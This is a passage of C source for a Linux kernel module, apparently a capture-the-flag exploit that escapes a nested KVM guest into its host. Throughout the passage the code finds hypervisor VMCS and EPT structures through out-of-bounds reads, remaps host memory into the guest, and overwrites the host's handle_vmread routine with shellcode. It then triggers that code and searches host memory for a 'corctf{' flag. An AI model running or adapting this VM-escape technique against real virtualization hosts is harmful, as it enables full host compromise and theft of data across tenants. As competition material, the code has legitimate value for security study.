    pr_info("vmcs12[0] = %llx\n", zero_val);

    for (i = 1; i < (0x4000*0x200); i += 2) {
        pos_offset = i;
        neg_offset = -i;
        // seen: 0xe8 0x28 0x68

        pos_val = read_guy(pos_offset);
        if (pos_val == vmptrld_page_pa && read_guy(pos_offset-2) == vmxon_page_pa) {
            found_val = pos_val;
            found_offset = pos_offset;
            break;
        }

        // in practice negative offset is rare/impossible?
        // commented out bc it keeps going too far and crashing
        //neg_val = read_guy(neg_offset);
        //if (neg_val == vmptrld_page_pa && read_guy(neg_offset-2) == vmxon_page_pa) {
        //    found_val = neg_val;
        //    found_offset = neg_offset;
        //    break;
        //}

        if (i > 0x1000 && i < 0x2000) {
            pr_info("vmcs12[%llx * 8] = %llx\n", pos_offset, pos_val);
            //pr_info("vmcs12[%llx * 8] = %llx\n", neg_offset, neg_val);
        }
    }
    if (found_val == 0) {
        pr_info("[exp]: L1 VMCS NOT FOUND :(\n");
        *nested_vmx_offset = 0;
        return 0;
    } else {
        pr_info("[exp]: Found vmcs in l1 at offset %lld; value: %llx\n", found_offset, found_val);
        *nested_vmx_offset = found_offset;
        return 1;
    }
}

static int proc_open(struct inode *inode, struct file *filep) {
    uint64_t l1_vmcs_offset = 0;
    uint64_t nested_vmx_offset = 0;
    uint64_t l2_vmcs_addr = 0;

    uint64_t eptp_value = 0;
    uint64_t ept_offset = 0;
    uint64_t ept_addr = 0;

    uint64_t pml4e_value = 0;
    uint64_t pml4e_offset = 0;
    uint64_t pml4e_addr = 0;

    uint64_t *pgde_page = 0;
    uint64_t pgde_page_pa = 0;

    uint64_t l2_entry = 0;

    uint64_t physbase = 0;
    uint64_t cr3 = 0;
    uint64_t *pgd = 0;

    uint64_t handle_vmread_page = 0;
    uint8_t *handle_vmread = 0;

    uint64_t i;

    if (!find_l1_vmcs(&l1_vmcs_offset)) {
        return 0; // not found
    }

    if (!find_nested_vmx(&nested_vmx_offset)) {
        return 0; // not found
    }

    l2_vmcs_addr = read_guy(nested_vmx_offset+1);
    pr_info("[exp]: YOU ARE HERE: %llx\n", l2_vmcs_addr);

    physbase = l2_vmcs_addr & ~0xfffffffull;
    pr_info("[exp]: probably physbase: %llx\n", l2_vmcs_addr & ~0xfffffff);

    eptp_value = read_guy(l1_vmcs_offset-50);
    pr_info("[exp]: eptp_value: %llx\n", eptp_value);

    ept_addr = physbase + (eptp_value & ~0xfffull);
    pr_info("[exp]: ept_addr: %llx\n", ept_addr);

    ept_offset = (ept_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: ept_offset: %llx\n", ept_offset);

    // read first entry in ept to get the PML4E
    pml4e_value = read_guy(ept_offset);
    pr_info("[exp]: pml4e_value: %llx\n", pml4e_value);

    pml4e_addr = physbase + (pml4e_value & ~0xfffull);
    pr_info("[exp]: pml4e_addr: %llx\n", pml4e_addr);

    pml4e_offset = (pml4e_addr-l2_vmcs_addr) / 8;
    pr_info("[exp]: pml4e_offset: %llx\n", pml4e_offset);

    // at 6GB will be an identity mapping of the l1 memory in l2
    write_guy(pml4e_offset + 6, 0x987);

    cr3 = read_cr3();
    pgd = (cr3 & ~0xfffull) + page_offset_base;
    pr_info("[exp]: pgd: %llx\n", pgd);

    pgde_page = kzalloc(0x1000, GFP_KERNEL);
    pgde_page_pa = virt_to_phys(pgde_page);

    // sticking the l1 mapping at the PGD entry the LDT remap usually goes at cuz why not
    pgd[272] = pgde_page_pa | 0x7;

    // huge and rwxp
    l2_entry = 0x180000000 | (1<<7) | 0x3;

    pgde_page[0] = l2_entry;

    // in THEORY I can access memory at 0xffff880000000000 now
    pr_info("TEST: %llx\n", *((uint64_t *)0xffff880000000000));

    // look for 0x3ec6780f to find the page where handle_vmread is at
    for (i = 0; i < (1024ull << 20); i += 0x1000) {
        unsigned int val = *((unsigned int *)(0xffff880000000df8 + i));

        // check the value and check if relocations were applied
        if (val == 0x3ec6780f && *((unsigned int *)(0xffff880000000df8 + 0xb + i)) != 0) {
            handle_vmread_page = 0xffff880000000000 + i;
            break;
        }
    }

    pr_info("found handle_vmread page at: %llx\n", handle_vmread_page);

    handle_vmread = handle_vmread_page + 0x4d0;
    pr_info("handle_vmread at: %llx\n", handle_vmread);

    // I don't want to figure out the address of nested_vmx_succeeded so pad with nops just up to that call
    // and make the instruction just after nested_vmx_succeeded returns be ret
    memset(handle_vmread, 0x90, 0x281);
    handle_vmread[0x286] = 0xc3;

    // -1 to remove null terminator
    memcpy(handle_vmread, shellcode, sizeof(shellcode)-1);

    // do it
    read_guy(0);

    // scan for flag in memory
    for (i = 0; i < 1024ull << 20; i+= 0x1000) {
        if (!memcmp(0xffff880000000000 + i, "corctf{", 7)) {
            pr_info("flag: %s\n", 0xffff880000000000 + i);
            break;
        }
    }

    return 0;
}

static ssize_t proc_read(struct file* filep, char* __user buffer, size_t len, loff_t* offset) {
    return 0;
}

static ssize_t proc_write(struct file* filep, const char* __user u_buffer, size_t len, loff_t* offset) {
    return 0;
}

void __no_profile native_write_cr4(unsigned long val)
{
        unsigned long bits_changed = 0;
        asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
}

static inline int vmxon(uint64_t phys)
{
        uint8_t ret;

        __asm__ __volatile__ ("vmxon %[pa]; setna %[ret]"
                : [ret]"=rm"(ret)
                : [pa]"m"(phys)
                : "cc", "memory");

        return ret;
}

static inline int vmptrld(uint64_t vmcs_pa)
{
        uint8_t ret;

        __asm__ __volatile__ ("vmptrld %[pa]; setna %[ret]"
                : [ret]"=rm"(ret)
                : [pa]"m"(vmcs_pa)
                : "cc", "memory");

        return ret;
}


static inline uint64_t rdmsr_guy(uint32_t msr)
{
    uint32_t a, d;

    __asm__ __volatile__("rdmsr" : "=a"(a), "=d"(d) : "c"(msr) : "memory");

    return a | ((uint64_t) d << 32);
}


static inline uint32_t vmcs_revision(void)
{
    return rdmsr_guy(MSR_IA32_VMX_BASIC);
}

static int __init proc_init(void)
{
    void *vmxon_page, *vmptrld_page;
    struct proc_dir_entry *new;
    unsigned long cr4;
    int res;

    cr4 = native_read_cr4();
    cr4 |= 1ul << 13;
    native_write_cr4(cr4);

    pr_info("[exp]: set cr4 to %lx", cr4);
    vmxon_page = kzalloc(0x1000, GFP_KERNEL);
    vmptrld_page = kzalloc(0x1000, GFP_KERNEL);

    vmxon_page_pa = virt_to_phys(vmxon_page);
    vmptrld_page_pa = virt_to_phys(vmptrld_page);

    *(uint32_t *)(vmxon_page) = vmcs_revision();
    *(uint32_t *)(vmptrld_page) = vmcs_revision();

    res = vmxon(vmxon_page_pa);
    pr_info("[exp]: vmxon returned %d", res);

    res = vmptrld(vmptrld_page_pa);
    pr_info("[exp]: vmptrld returned %d", res);

    pr_info("[exp]: vmxon_pa %llx", vmxon_page_pa);
    pr_info("[exp]: vmptrld_pa %llx", vmptrld_page_pa);

    pr_info("page_offset_base: %lx\n", page_offset_base);

    new = proc_create("exp", 0777, NULL, &fops);
    pr_info("[exp]: init\n");
    return 0;
}

static void __exit proc_exit(void)
{
    remove_proc_entry("exp", NULL);
    pr_info("exp: exit\n");
}

module_init(proc_init);
module_exit(proc_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("zolutal");
MODULE_DESCRIPTION("bleh");
MODULE_VERSION("0.1");